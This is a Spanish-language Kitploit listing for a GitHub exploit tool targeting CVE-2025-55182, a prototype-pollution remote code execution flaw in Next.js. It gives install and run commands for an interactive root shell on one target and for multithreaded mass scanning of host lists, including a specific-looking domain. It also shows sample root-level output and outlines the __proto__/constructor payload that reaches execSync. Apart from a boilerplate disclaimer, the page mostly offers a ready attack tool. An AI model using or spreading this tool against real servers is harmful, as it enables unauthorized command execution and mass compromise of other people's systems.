Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-55182-React2shell — CVE-2025-55182 Herramienta de Explotación – Exploit en Python 2.7 para contaminación de prototipos en Next.js que conduce a RCE | Kitploit
Herramientas/GitHubGitHub/jenderal92/cve-2025-55182-react2shell
Escáneres de VulnerabilidadesGeneración de PayloadsExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubjenderal92/cve-2025-55182-react2shell

CVE-2025-55182-React2shell

CVE-2025-55182 Herramienta de Explotación – Exploit en Python 2.7 para contaminación de prototipos en Next.js que conduce a RCE

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
61hace 2 mesesAún no revisado

CVE-2025-55182 - React2shell

Un exploit en Python 2.7 para CVE-2025-55182 – una vulnerabilidad crítica de contaminación de prototipos / RCE en aplicaciones Next.js.
Esta herramienta permite tanto shell interactivo para un solo objetivo como escaneo masivo de múltiples hosts con subprocesos múltiples, salida colorida y respaldo HTTPS automático.


🚀 Características

  • ✅ Shell interactivo para objetivos individuales – ejecutar comandos arbitrarios del sistema
  • ✅ Escaneo masivo desde una lista de archivos – subprocesos múltiples, rápido, resultados guardados automáticamente
  • ✅ Auto‑detección – URL única → modo shell, archivo existente → modo escaneo masivo
  • ✅ HTTPS automático – agrega https:// si no se proporciona protocolo
  • ✅ Escritura de archivos segura para subprocesos – guarda los resultados vulnerables en tiempo real
  • ✅ Comandos personalizados – cambia el id predeterminado por cualquier comando (whoami, ls, etc.)
  • ✅ Sin dependencias externas – solo requests (fácil de instalar)

📋 Requisitos

  • Python 2.7 (la herramienta está específicamente escrita para Python 2.7)
  • Biblioteca requests – instala con:
    root@kitploit:~
    pip install requests
    

· Un terminal que soporte colores ANSI (la mayoría de terminales Linux/macOS, Windows Terminal, PowerShell)


📦 Instalación

root@kitploit:~
git clone https://github.com/Jenderal92/cve-2025-55182.git
cd CVE-2025-55182
pip install requests

Haz el script ejecutable (opcional):

root@kitploit:~
chmod +x CVE-2025-55182.py

🎯 Uso

  1. Shell interactivo (Objetivo único)
root@kitploit:~
python2 CVE-2025-55182.py https://target.com

o sin protocolo (se agrega HTTPS automáticamente):

root@kitploit:~
python2 CVE-2025-55182.py target.com

Una vez conectado y verificado como vulnerable, obtienes un prompt de shell:

root@kitploit:~
$ id
uid=0(root) gid=0(root) groups=0(root)

$ whoami
root

$ ls -la
...

Comandos integrados:

· exit / quit – cerrar shell · clear – limpiar pantalla · help – mostrar ayuda

  1. Escaneo masivo (Lista de objetivos)

Prepara un archivo con un objetivo por línea (con o sin http/https):

targets.txt

root@kitploit:~
app-site3.htface.tech
https://example.com
http://127.0.0.1:3000
vulnerable-site.org

Ejecuta escaneo masivo (por defecto: 10 hilos, comando id, salida res.txt):

root@kitploit:~
python2 CVE-2025-55182.py targets.txt

Personaliza hilos, comando, archivo de salida:

root@kitploit:~
python2 CVE-2025-55182.py targets.txt 20 "whoami" results.txt

· 20 – número de hilos · whoami – comando a ejecutar en cada objetivo vulnerable · results.txt – archivo de salida (solo se guardan las entradas vulnerables)

Ejemplo de salida de escaneo masivo:

root@kitploit:~
[INFO] Loaded 4 URLs
[INFO] Threads: 10, Command: 'id', Output: res.txt

[*] (1/4) Checking: https://site.com
[+] VULNERABLE: https://site.com
    Status: 303
    Output: uid=0(root) gid=0(root) groups=0(root)

[-] NOT VULNERABLE: https://example.com
...

Resultados guardados (res.txt):

root@kitploit:~
domain : https://site.com
cmd : uid=0(root) gid=0(root) groups=0(root)
--------------------------------------------------

🧪 Cómo funciona

El exploit envía una solicitud multipart/form-data manipulada a un endpoint de Next.js (se agrega /login si la ruta está vacía).
Abusa de la contaminación de prototipos (__proto__:then y constructor:constructor) para inyectar un prefijo malicioso que ejecuta un comando del sistema usando child_process.execSync().

El servidor responde con una redirección 303 que contiene la salida del comando en el encabezado x-action-redirect (o Location). La herramienta extrae el resultado de /login?a=<output>.


🛡️ Descargo de responsabilidad

Esta herramienta está destinada únicamente a fines educativos y pruebas de seguridad autorizadas.
El acceso no autorizado a sistemas informáticos es ilegal. El autor no asume ninguna responsabilidad por el mal uso o daño causado por este software.
Debes tener permiso explícito por escrito del propietario del sistema objetivo antes de usar este exploit.

Puedes ver más descargos en la portada de Jenderal92. Puedes consultarlo ¡AQUÍ!

Descargar herramienta